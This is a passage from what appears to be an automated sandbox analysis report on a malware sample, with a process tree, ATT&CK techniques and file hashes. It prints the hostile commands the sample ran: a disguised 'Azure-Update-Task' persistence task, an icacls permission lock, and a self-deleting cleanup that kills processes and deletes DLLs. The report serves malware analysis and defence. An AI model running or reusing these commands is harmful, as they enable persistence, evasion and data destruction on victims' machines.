                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                              PID:4468
                                                                                                                                                                                                            • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                              C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Enumerates connected drives
                                                                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                              PID:2824
                                                                                                                                                                                                              • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                C:\Windows\syswow64\MsiExec.exe -Embedding 425DEBF63A008BBC3E8646A5743F9406 C
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                PID:4368
                                                                                                                                                                                                              • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                C:\Windows\syswow64\MsiExec.exe -Embedding 5C022F0B9F9F35B2BE623BC1511F523D
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                • Blocklisted process makes network request
                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                PID:8176
                                                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                  "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                  PID:6368
                                                                                                                                                                                                              • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                C:\Windows\syswow64\MsiExec.exe -Embedding 6B3F3B7ABBF59B880751939C893E3F15 E Global\MSI0000
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                PID:4880
                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                              PID:5136
                                                                                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                              PID:6524
                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                PID:6076
                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                              PID:5524
                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                              PID:6408
                                                                                                                                                                                                            • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                                                                                              PID:4452
                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                              PID:4672
                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                              PID:1308
                                                                                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:6412
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\C08D.exe
                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\C08D.exe
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                PID:868
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\C08D.exe
                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\C08D.exe
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                                                  PID:6344
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                    icacls "C:\Users\Admin\AppData\Local\71a568c4-992d-4868-be5a-2282f1e3c5e3" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                    PID:7632
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\C08D.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\C08D.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                    PID:5324
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\C08D.exe
                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\C08D.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                      • Modifies extensions of user files
                                                                                                                                                                                                                      PID:5032
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\bed944b9-5045-49e2-9ba9-09a0364b6354\build2.exe
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\bed944b9-5045-49e2-9ba9-09a0364b6354\build2.exe"
                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                        PID:6700
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\bed944b9-5045-49e2-9ba9-09a0364b6354\build2.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\bed944b9-5045-49e2-9ba9-09a0364b6354\build2.exe"
                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                                                          PID:5088
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\bed944b9-5045-49e2-9ba9-09a0364b6354\build2.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                              PID:4316
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                taskkill /im build2.exe /f
                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                PID:852
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                timeout /t 6
                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                                PID:7916
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\bed944b9-5045-49e2-9ba9-09a0364b6354\build3.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\bed944b9-5045-49e2-9ba9-09a0364b6354\build3.exe"
                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                                          PID:5532
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\bed944b9-5045-49e2-9ba9-09a0364b6354\build3.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\bed944b9-5045-49e2-9ba9-09a0364b6354\build3.exe"
                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                              PID:6780
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                PID:7172
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\E4DF.exe
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\E4DF.exe
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                                                                    PID:6200
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.170.0822.0002\FileSyncConfig.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.170.0822.0002\FileSyncConfig.exe"
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                    PID:2104
                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                    PID:6232
                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                    PID:4516
                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:6128
                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                      PID:6804
                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                      PID:5196
                                                                                                                                                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                                                                      PID:6184
                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                      PID:8000
                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                      PID:5900
                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                      PID:3156
                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                      PID:6156
                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                      PID:776
                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                      PID:5040
                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:8084
                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                        PID:6664
                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:8072

                                                                                                                                                                                                                        Network

                                                                                                                                                                                                                        MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                        Initial Access

                                                                                                                                                                                                                        Execution

                                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                        Persistence

                                                                                                                                                                                                                        Modify Existing Service

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1031

                                                                                                                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                                                                                                                        2
                                                                                                                                                                                                                        T1060

                                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                        Privilege Escalation

                                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                        Defense Evasion

                                                                                                                                                                                                                        Modify Registry

                                                                                                                                                                                                                        4
                                                                                                                                                                                                                        T1112

                                                                                                                                                                                                                        Disabling Security Tools

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1089

                                                                                                                                                                                                                        Virtualization/Sandbox Evasion

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1497

                                                                                                                                                                                                                        File Permissions Modification

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1222

                                                                                                                                                                                                                        Install Root Certificate

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1130

                                                                                                                                                                                                                        Credential Access

                                                                                                                                                                                                                        Credentials in Files

                                                                                                                                                                                                                        3
                                                                                                                                                                                                                        T1081

                                                                                                                                                                                                                        Discovery

                                                                                                                                                                                                                        Software Discovery

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1518

                                                                                                                                                                                                                        Query Registry

                                                                                                                                                                                                                        7
                                                                                                                                                                                                                        T1012

                                                                                                                                                                                                                        Virtualization/Sandbox Evasion

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1497

                                                                                                                                                                                                                        System Information Discovery

                                                                                                                                                                                                                        7
                                                                                                                                                                                                                        T1082

                                                                                                                                                                                                                        Peripheral Device Discovery

                                                                                                                                                                                                                        2
                                                                                                                                                                                                                        T1120

                                                                                                                                                                                                                        Lateral Movement

                                                                                                                                                                                                                        Collection

                                                                                                                                                                                                                        Data from Local System

                                                                                                                                                                                                                        3
                                                                                                                                                                                                                        T1005

                                                                                                                                                                                                                        Exfiltration

                                                                                                                                                                                                                        Command and Control

                                                                                                                                                                                                                        Web Service

                                                                                                                                                                                                                        1
                                                                                                                                                                                                                        T1102

                                                                                                                                                                                                                        Impact

                                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSCE2E6403\Wed150b6a68b74a9.exe
                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          b7f786e9b13e11ca4f861db44e9fdc68

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          bcc51246a662c22a7379be4d8388c2b08c3a3248

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          f8987faadabfe4fd9c473ac277a33b28030a7c2a3ea20effc8b27ae8df32ddf6

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          53185e79e9027e87d521aef18488b57b900d3415ee132c3c058ed49c5918dd53a6259463c976928e463ccc1e058d1c9c07e86367538c6bed612ede00c6c0f1a5

                                                                                                                                                                                                                          Download Submit
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSCE2E6403\Wed150b6a68b74a9.exe
                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          b7f786e9b13e11ca4f861db44e9fdc68

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          bcc51246a662c22a7379be4d8388c2b08c3a3248

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          f8987faadabfe4fd9c473ac277a33b28030a7c2a3ea20effc8b27ae8df32ddf6

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          53185e79e9027e87d521aef18488b57b900d3415ee132c3c058ed49c5918dd53a6259463c976928e463ccc1e058d1c9c07e86367538c6bed612ede00c6c0f1a5

                                                                                                                                                                                                                          Download Submit
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSCE2E6403\Wed151f5e3fd2.exe
                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          1b30ac88a74e6eff68433de176b3a5c3

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          31039df81b419ae7f777672785c7bcf9e7004d04

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          0fd88e63305a7a711efc11534ab1b681d7ad419c2832a2ac9f79a9860d520e28

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          c6fb8368cfba84ce3c09c30345b05fce8f30bc59536fecd4b9226bbd2d0bde5910f162b8c68985f99ba10bc9564503a26712b9af8937ef03634a3f5bd3c0f730

                                                                                                                                                                                                                          Download Submit
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSCE2E6403\Wed151f5e3fd2.exe
                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          1b30ac88a74e6eff68433de176b3a5c3

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          31039df81b419ae7f777672785c7bcf9e7004d04

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          0fd88e63305a7a711efc11534ab1b681d7ad419c2832a2ac9f79a9860d520e28

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          c6fb8368cfba84ce3c09c30345b05fce8f30bc59536fecd4b9226bbd2d0bde5910f162b8c68985f99ba10bc9564503a26712b9af8937ef03634a3f5bd3c0f730

                                                                                                                                                                                                                          Download Submit
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSCE2E6403\Wed15228d911b9d5c.exe
                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          118cf2a718ebcf02996fa9ec92966386

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          f0214ecdcb536fe5cce74f405a698c1f8b2f2325

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          7047db11a44cfcd1965dcf6ac77d650f5bb9c4282bf9642614634b09f3dd003d

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          fe5355b6177f81149013c444c244e540d04fbb2bcd2bf3bb3ea9e8c8152c662d667a968a35b24d1310decb1a2db9ac28157cda85e2ef69efee1c9152b0f39089

                                                                                                                                                                                                                          Download Submit
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSCE2E6403\Wed15228d911b9d5c.exe
                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          118cf2a718ebcf02996fa9ec92966386

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          f0214ecdcb536fe5cce74f405a698c1f8b2f2325

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          7047db11a44cfcd1965dcf6ac77d650f5bb9c4282bf9642614634b09f3dd003d

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          fe5355b6177f81149013c444c244e540d04fbb2bcd2bf3bb3ea9e8c8152c662d667a968a35b24d1310decb1a2db9ac28157cda85e2ef69efee1c9152b0f39089

                                                                                                                                                                                                                          Download Submit
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSCE2E6403\Wed1529d8198a8f0c1.exe
                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          37044c6ef79c0db385c55875501fc9c3

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          29ee052048134f5aa7dd31faf7264a03d1714cf3

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          7a6f2506192e9266cddbc7d2e17b7f2fa2f398aa83f0d20b267ae19b15469be7

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          3b4653de8649aced999f45c56241dde91700046fe2525e412ecbfc0568271ca62ad3f53abbcb8c03755e97de2de8554fa60f51f3b3254a149087956ae5fae89c

                                                                                                                                                                                                                          Download Submit
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSCE2E6403\Wed1529d8198a8f0c1.exe
                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          37044c6ef79c0db385c55875501fc9c3

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          29ee052048134f5aa7dd31faf7264a03d1714cf3

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          7a6f2506192e9266cddbc7d2e17b7f2fa2f398aa83f0d20b267ae19b15469be7

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          3b4653de8649aced999f45c56241dde91700046fe2525e412ecbfc0568271ca62ad3f53abbcb8c03755e97de2de8554fa60f51f3b3254a149087956ae5fae89c

                                                                                                                                                                                                                          Download Submit
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSCE2E6403\Wed154a69e494d5e99ca.exe
                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          e53e5eb8d1567f3a4e6b44455b7ff1e6

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          fb5a98dd967f95256187ea8b2829f50dfedd7e0a

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          d9568e7ea47bd3ef706f60b74411e11741fb7084e1499c1d56cbba7aa80b8874

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          1231c9788414532bf91b7c33f8173c7e98e7dfa4aaaf20bfbd6668146147edce78624807c8f6262f07c9ee88256bc278819a9b7b32bd7f4e9cef8a50da09ecca

                                                                                                                                                                                                                          Download Submit
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSCE2E6403\Wed154a69e494d5e99ca.exe
                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          e53e5eb8d1567f3a4e6b44455b7ff1e6

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          fb5a98dd967f95256187ea8b2829f50dfedd7e0a

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          d9568e7ea47bd3ef706f60b74411e11741fb7084e1499c1d56cbba7aa80b8874

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          1231c9788414532bf91b7c33f8173c7e98e7dfa4aaaf20bfbd6668146147edce78624807c8f6262f07c9ee88256bc278819a9b7b32bd7f4e9cef8a50da09ecca

                                                                                                                                                                                                                          Download Submit
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSCE2E6403\Wed15566afaea59e.exe
                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          485151a35174370bbc10c756bd6a2555

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          c51f94dee08c26667d1b2d6e2cb5a9d5138f931b

